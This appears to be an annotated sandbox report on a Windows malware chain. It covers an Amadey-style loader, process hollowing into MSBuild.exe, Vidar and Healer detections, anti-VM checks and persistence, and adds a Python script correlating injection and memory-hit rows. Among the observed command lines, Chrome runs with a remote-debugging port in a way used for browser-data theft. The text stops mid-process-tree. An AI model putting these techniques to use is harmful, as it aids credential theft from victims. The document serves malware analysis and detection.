Drops desktop.ini file(s) 3 IoCs
description  ioc  Process
File opened for modification  C:\Users\Public\desktop.ini  firefox.exe
File opened for modification  C:\Users\Public\Documents\desktop.ini  firefox.exe
File opened for modification  C:\Users\Admin\Documents\desktop.ini  firefox.exe
(All three by firefox.exe; on their own these are ordinary browser profile writes and carry little weight.)

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description  ioc  Process
File opened (read-only)  \??\F:  a28245d7.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description  ioc  Process
File opened for modification  \??\PhysicalDrive0  a28245d7.exe
The only evidence here is a raw-disk handle opened with write access by a28245d7.exe; no write to sector 0 is recorded, and the same process installs the Kaspersky-named klupd_* drivers, so confirm against a disk image before treating this as a bootkit.
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource  yara_rule
behavioral3/files/0x0006000000021593-1028.dat  autoit_exe
behavioral3/files/0x0009000000024be7-30472.dat  autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs
pid  Process
1332  tasklist.exe
2376  tasklist.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
pid  Process
5044 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe; 5788 rapes.exe; 5488 b842abf8f3.exe; 3608 rapes.exe; 4536 ec9a0b61cd.exe; 1192 74957b3341.exe; 1360 ab7380df2b.exe; 4404 rapes.exe; 10476 rapes.exe; 13160 fd5d9b8176.exe; 6588 cf533b34eb.exe; 10624 TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE; 12232 483d2fa8a0d53818306efeb32d3.exe; 3972 rapes.exe; 7780 rapes.exe
The same ten images appear under the VirtualBox ACPI, Wine and BIOS checks above, consistent with one shared loader stub performing all four anti-analysis checks.

Suspicious use of SetThreadContext 10 IoCs
description  pid  Process  procid_target
PID 4880 set thread context of 5196  4880  UYpk7xI.exe  97
PID 2428 set thread context of 4580  2428  jokererer.exe  101
PID 3416 set thread context of 7164  3416  jokererer.exe  218
PID 5416 set thread context of 2716  5416  UYpk7xI.exe  221
PID 3116 set thread context of 2492  3116  TbV75ZR.exe  236
PID 7092 set thread context of 7080  7092  xZRvIQ5.exe  261
PID 4992 set thread context of 1728  4992  EPTwCQd.exe  273
PID 13160 set thread context of 12980  13160  fd5d9b8176.exe  376
PID 6588 set thread context of 8148  6588  cf533b34eb.exe  378
PID 7796 set thread context of 5612  7796  4220f70f80.exe  382
Cross-references within this report: PID 5196, hollowed by UYpk7xI.exe, is where all 36 family_vidar_v7 memory hits land; PID 2492 is the MSBuild.exe that later crashed (WerFault, procid 236) and spawned a child with a spoofed parent; PIDs 12980 and 8148 are the svchost015.exe instances that download PE files.
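The yara memory hits near the top of the Signatures list and the SetThreadContext rows just above are two views of the same injection chain; joining them on the target PID tells you which process really hosts each detected family. The script below is an added example (not part of the sandbox report) that does that join. MEMORY_HIT_LINES and INJECTION_LINES are a constructed subset of the rows printed under "Detect Vidar Stealer", "Detects Healer" and "Suspicious use of SetThreadContext"; DROPPED_EXE_PIDS copies three rows of "Executes dropped EXE". The regexes assume the exact row layout this report uses.

```python
"""Correlate the report's SetThreadContext rows with its yara memory hits.

Added example, not part of the sandbox report. The input lists below are a
constructed subset of rows copied from this report; the regexes assume the
row layout the report prints.
"""
import re
from collections import defaultdict

MEMORY_HIT_LINES = [
    "behavioral3/memory/5196-36-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7",
    "behavioral3/memory/5196-35-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7",
    "behavioral3/memory/5196-37-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7",
    "behavioral3/memory/5196-2444-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7",
    "behavioral3/memory/1360-2460-0x0000000000A20000-0x0000000000E68000-memory.dmp family_vidar_v7",
    "behavioral3/memory/1360-2461-0x0000000000A20000-0x0000000000E68000-memory.dmp healer",
    "behavioral3/memory/1360-2462-0x0000000000A20000-0x0000000000E68000-memory.dmp healer",
    "behavioral3/memory/1360-2770-0x0000000000A20000-0x0000000000E68000-memory.dmp healer",
]
INJECTION_LINES = [
    "PID 4880 set thread context of 5196 4880 UYpk7xI.exe 97",
    "PID 2428 set thread context of 4580 2428 jokererer.exe 101",
    "PID 3416 set thread context of 7164 3416 jokererer.exe 218",
    "PID 5416 set thread context of 2716 5416 UYpk7xI.exe 221",
    "PID 3116 set thread context of 2492 3116 TbV75ZR.exe 236",
    "PID 7092 set thread context of 7080 7092 xZRvIQ5.exe 261",
    "PID 4992 set thread context of 1728 4992 EPTwCQd.exe 273",
    "PID 13160 set thread context of 12980 13160 fd5d9b8176.exe 376",
    "PID 6588 set thread context of 8148 6588 cf533b34eb.exe 378",
    "PID 7796 set thread context of 5612 7796 4220f70f80.exe 382",
]
DROPPED_EXE_PIDS = {5788: "rapes.exe", 4880: "UYpk7xI.exe", 1360: "ab7380df2b.exe"}

HIT_RE = re.compile(r"^(?P<task>\w+)/memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
                    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp\s+(?P<rule>\S+)$")
INJ_RE = re.compile(r"^PID (?P<pid>\d+) set thread context of (?P<target>\d+) \d+ (?P<image>\S+) (?P<procid>\d+)$")


def parse_memory_hits(lines):
    hits = []
    for line in lines:
        m = HIT_RE.match(line.strip())
        if not m:
            continue  # skip rows that do not follow the dump naming scheme
        hits.append({"task": m["task"], "pid": int(m["pid"]), "idx": int(m["idx"]),
                     "start": int(m["start"], 16), "end": int(m["end"], 16), "rule": m["rule"]})
    return hits


def consolidate(hits):
    """Fold repeated dumps of one region into a single record: the 36 Vidar hits in
    this report are the same 0x29000-byte image scanned again and again."""
    regions = defaultdict(lambda: {"count": 0, "rules": set(), "size": 0})
    for h in hits:
        r = regions[(h["task"], h["pid"], h["start"], h["end"])]
        r["count"] += 1
        r["rules"].add(h["rule"])
        r["size"] = h["end"] - h["start"]
    return dict(regions)


def parse_injections(lines):
    return [{"pid": int(m["pid"]), "target": int(m["target"]), "image": m["image"],
             "procid": int(m["procid"])}
            for m in (INJ_RE.match(l.strip()) for l in lines) if m]


def attribute(regions, injections, known_images):
    """For each flagged region say which process hosts it and who injected it."""
    by_target = {i["target"]: i for i in injections}
    out = []
    for (task, pid, start, end), info in sorted(regions.items()):
        inj = by_target.get(pid)
        image = known_images.get(pid) or (f"hollowed child of {inj['image']}" if inj else "unknown")
        out.append({"task": task, "pid": pid, "image": image,
                    "injector": inj["image"] if inj else None,
                    "injector_pid": inj["pid"] if inj else None,
                    "region": f"0x{start:X}-0x{end:X}", "size": info["size"],
                    "rules": sorted(info["rules"]), "hits": info["count"]})
    return out


if __name__ == "__main__":
    regions = consolidate(parse_memory_hits(MEMORY_HIT_LINES))
    for row in attribute(regions, parse_injections(INJECTION_LINES), DROPPED_EXE_PIDS):
        print(row)
```

On this report's rows the join gives two findings: the Vidar image lives in a hollowed child of UYpk7xI.exe (PID 5196, injected by PID 4880), while PID 1360 is ab7380df2b.exe itself, executed directly from disk with no injector, and its single 0x448000-byte region matches both family_vidar_v7 and healer.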
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description  ioc  Process
File opened (read-only)  \??\VBoxMiniRdrDN  36575e69.exe
File opened (read-only)  \??\VBoxMiniRdrDN  a28245d7.exe

Drops file in Windows directory 14 IoCs
description  ioc  Process
File created  C:\Windows\Tasks\rapes.job  37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe  (legacy scheduled-task job for the Amadey install_file rapes.exe)
File opened for modification  C:\Windows\SpecificsHeaven  7IIl2eE.exe
File opened for modification  C:\Windows\CorrectionsGeographic  7IIl2eE.exe
File opened for modification  C:\Windows\RowTopics  7IIl2eE.exe
File opened for modification  C:\Windows\DiscussedFacial  7IIl2eE.exe
File opened for modification  C:\Windows\EnglandDeleted  7IIl2eE.exe
File opened for modification  C:\Windows\GentleLogging  7IIl2eE.exe
File opened for modification  C:\Windows\LogisticsNotre  7IIl2eE.exe
File opened for modification  C:\Windows\ProvidingMilwaukee  7IIl2eE.exe
File opened for modification  C:\Windows\WallpapersHo  7IIl2eE.exe
File opened for modification  C:\Windows\EstateLegislative  7IIl2eE.exe
File opened for modification  C:\Windows\JenniferSubdivision  7IIl2eE.exe
File opened for modification  C:\Windows\BrandonStat  7IIl2eE.exe
File opened for modification  C:\Windows\PotteryUser  7IIl2eE.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. Helper DLLs registered under SOFTWARE\Microsoft\NetSh are loaded whenever netsh runs, which makes the key a persistence point.
description  ioc  Process
Key opened  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh  a28245d7.exe
Key opened  \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh  a28245d7.exe
Only key opens are recorded; no helper DLL value is written in the visible IoCs.

Program crash 1 IoCs
pid  pid_target  Process  procid_target
3916  2492  WerFault.exe  236
(PID 2492 is the MSBuild.exe instance that TbV75ZR.exe, PID 3116, injected into via SetThreadContext, procid_target 236.)
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc  Process
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  by: cmd.exe (x9, plus CMD.exe x1), MSBuild.exe (x8), powershell.exe (x5), taskkill.exe (x5), findstr.exe (x3), d0fba8cbde.exe (x2), mshta.exe (x2), schtasks.exe (x2), svchost015.exe (x2), tasklist.exe (x2), timeout.exe (x2)
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  once each by: 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe, 36575e69.exe, 483d2fa8a0d53818306efeb32d3.exe, 74957b3341.exe, 7IIl2eE.exe, 9ff7443f7f.exe, a28245d7.exe, ab7380df2b.exe, b842abf8f3.exe, cf533b34eb.exe, choice.exe, ec9a0b61cd.exe, extrac32.exe, fd5d9b8176.exe, Passwords.com, Rm3cVPI.exe, svchost.exe, TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE, u75a1_003.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage  d0fba8cbde.exe
The list stops at the 64-entry cap. Many of these opens come from Windows utilities (cmd, findstr, taskkill, timeout, choice) that read the NLS key as part of normal startup; the rows that matter are the malware images and the explicit InstallLanguage query by d0fba8cbde.exe.
Checks processor information in registry 2 TTPs 38 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 74957b3341.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 74957b3341.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | MSBuild.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | MSBuild.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | MSBuild.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | MSBuild.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | chrome.exe
Delays execution with timeout.exe 2 IoCs
pid | Process
6588 | timeout.exe
10544 | timeout.exe
Enumerates system info in registry 2 TTPs 15 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Kills process with taskkill 5 IoCs
pid | Process
4672 | taskkill.exe
4760 | taskkill.exe
1084 | taskkill.exe
1584 | taskkill.exe
2032 | taskkill.exe
Modifies data under HKEY_USERS 6 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | msedge.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | msedge.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133876600710942280" | chrome.exe
Modifies registry class 5 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-83325578-304917428-1200496059-1000\{D0C0301C-D712-4ADE-8C67-99BDBA4C177D} | msedge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-83325578-304917428-1200496059-1000\{494D639E-04AF-4801-90B6-63A2E0290CCF} | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings | firefox.exe
Modifies registry key 1 TTPs 5 IoCs
pid | Process
10080 | reg.exe
10416 | reg.exe
9280 | reg.exe
7452 | reg.exe
9444 | reg.exe
NTFS ADS 2 IoCs
description | ioc | Process
File opened for modification | C:\Users\Admin\AppData\Local\Temp\{fd9989c1-9e82-4819-a5b2-63078bff6123}\pmem:\MappedFixedPe_svchost015.exe_12980_0x400000_0x2e000_0B89D888C30758F522722A59E7FFBFD53A2964A3A9EF582969F6EB032DAF310F | a28245d7.exe
File opened for modification | C:\Users\Admin\AppData\Local\Temp\{fd9989c1-9e82-4819-a5b2-63078bff6123}\pmem:\MappedFixedPe_svchost015.exe_8148_0x400000_0x2e000_D7D2BC7916A73F931BC40235672179D4D33F93405E3D0EF34E9D150A3DDB6578 | a28245d7.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
9104 | schtasks.exe
11436 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process | consecutive entries
5044 | 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe | 2
5788 | rapes.exe | 2
5196 | MSBuild.exe | 2
4580 | MSBuild.exe | 4
5196 | MSBuild.exe | 2
5424 | chrome.exe | 2
5488 | b842abf8f3.exe | 6
5196 | MSBuild.exe | 4
3608 | rapes.exe | 2
4536 | ec9a0b61cd.exe | 2
5196 | MSBuild.exe | 2
4536 | ec9a0b61cd.exe | 4
5196 | MSBuild.exe | 2
1192 | 74957b3341.exe | 6
5020 | chrome.exe | 2
2720 | d0fba8cbde.exe | 4
1192 | 74957b3341.exe | 6
1360 | ab7380df2b.exe | 5
7164 | MSBuild.exe | 4
4404 | rapes.exe | 1
Suspicious behavior: LoadsDriver 5 IoCs
pid | Process | consecutive entries
7564 | a28245d7.exe | 5
Suspicious behavior: MapViewOfSection 3 IoCs
pid | Process | consecutive entries
7116 | u75a1_003.exe | 3
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs
pid | Process | consecutive entries
5424 | chrome.exe | 4
6088 | msedge.exe | 4
5020 | chrome.exe | 4
3612 | msedge.exe | 4
3124 | chrome.exe | 4
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process | consecutive entries
Token: SeShutdownPrivilege followed by Token: SeCreatePagefilePrivilege | 5424 | chrome.exe | 7 pairs (14 entries)
Token: SeShutdownPrivilege followed by Token: SeCreatePagefilePrivilege | 5020 | chrome.exe | 1 pair (2 entries)
Token: SeDebugPrivilege | 2032 | taskkill.exe | 1
Token: SeShutdownPrivilege followed by Token: SeCreatePagefilePrivilege | 5020 | chrome.exe | 2 pairs (4 entries)
Token: SeDebugPrivilege | 4672 | taskkill.exe | 1
Token: SeDebugPrivilege | 4760 | taskkill.exe | 1
Token: SeDebugPrivilege | 1084 | taskkill.exe | 1
Token: SeDebugPrivilege | 1584 | taskkill.exe | 1
Token: SeDebugPrivilege | 1392 | firefox.exe | 2
Token: SeDebugPrivilege | 1360 | ab7380df2b.exe | 1
Token: SeShutdownPrivilege followed by Token: SeCreatePagefilePrivilege | 3124 | chrome.exe | 4 pairs (8 entries)
Token: SeDebugPrivilege | 2376 | tasklist.exe | 1
Token: SeShutdownPrivilege followed by Token: SeCreatePagefilePrivilege | 3124 | chrome.exe | 1 pair (2 entries)
Token: SeDebugPrivilege | 1332 | tasklist.exe | 1
Token: SeShutdownPrivilege followed by Token: SeCreatePagefilePrivilege | 3124 | chrome.exe | 12 pairs (24 entries)
Suspicious use of FindShellTrayWindow 64 IoCs
pid | Process | consecutive entries
5424 | chrome.exe | 26
6088 | msedge.exe | 2
5020 | chrome.exe | 17
2720 | d0fba8cbde.exe | 2
5020 | chrome.exe | 9
2720 | d0fba8cbde.exe | 5
1392 | firefox.exe | 1
2720 | d0fba8cbde.exe | 1
1392 | firefox.exe | 1
Suspicious use of SendNotifyMessage 29 IoCs
pid | Process | consecutive entries
2720 | d0fba8cbde.exe | 8
1392 | firefox.exe | 12
2720 | d0fba8cbde.exe | 3
2032 | Passwords.com | 3
7956 | 9ff7443f7f.exe | 3
Suspicious use of SetWindowsHookEx 4 IoCs
pid | Process | consecutive entries
1392 | firefox.exe | 4
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target | consecutive entries
PID 5044 wrote to memory of 5788 | 5044 | 37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe | 90 | 3
PID 5788 wrote to memory of 4880 | 5788 | rapes.exe | 96 | 2
PID 4880 wrote to memory of 5196 | 4880 | UYpk7xI.exe | 97 | 12
PID 5788 wrote to memory of 2428 | 5788 | rapes.exe | 100 | 2
PID 2428 wrote to memory of 4580 | 2428 | jokererer.exe | 101 | 9
PID 5196 wrote to memory of 5424 | 5196 | MSBuild.exe | 102 | 2
PID 5424 wrote to memory of 1028 | 5424 | chrome.exe | 103 | 2
PID 5424 wrote to memory of 436 | 5424 | chrome.exe | 104 | 30
PID 5424 wrote to memory of 1896 | 5424 | chrome.exe | 105 | 2
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
C:\Windows\system32\sihost.exe (level 1)
  Command line: sihost.exe
  PID: 2560
  C:\Windows\SysWOW64\svchost.exe (level 2)
    Command line: "C:\Windows\System32\svchost.exe"
    - System Location Discovery: System Language Discovery
    PID: 1516
C:\Users\Admin\AppData\Local\Temp\37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe (level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID: 5044
  C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe (level 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 5788
    C:\Users\Admin\AppData\Local\Temp\10361660101\UYpk7xI.exe (level 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\10361660101\UYpk7xI.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory
      PID: 4880
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (level 4)
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        - System Location Discovery: System Language Discovery
        - Checks processor information in registry
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
        PID: 5196
        C:\Program Files\Google\Chrome\Application\chrome.exe (level 5)
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          - Uses browser remote debugging
          - Checks processor information in registry
          - Enumerates system info in registry
          - Modifies data under HKEY_USERS
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of WriteProcessMemory
          PID: 5424
          C:\Program Files\Google\Chrome\Application\chrome.exe (level 6)
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffb100dcf8,0x7fffb100dd04,0x7fffb100dd10
            PID: 1028
          C:\Program Files\Google\Chrome\Application\chrome.exe (level 6)
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2052,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2032 /prefetch:2
            PID: 436
          C:\Program Files\Google\Chrome\Application\chrome.exe (level 6)
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1600,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2272 /prefetch:3
            PID: 1896
          C:\Program Files\Google\Chrome\Application\chrome.exe (level 6)
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2384,i,4233142642630253882,11680080667480506615,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2532 /prefetch:8
            PID: 4660
          C:\Program Files\Google\Chrome\Application\chrome.exe (level 6)
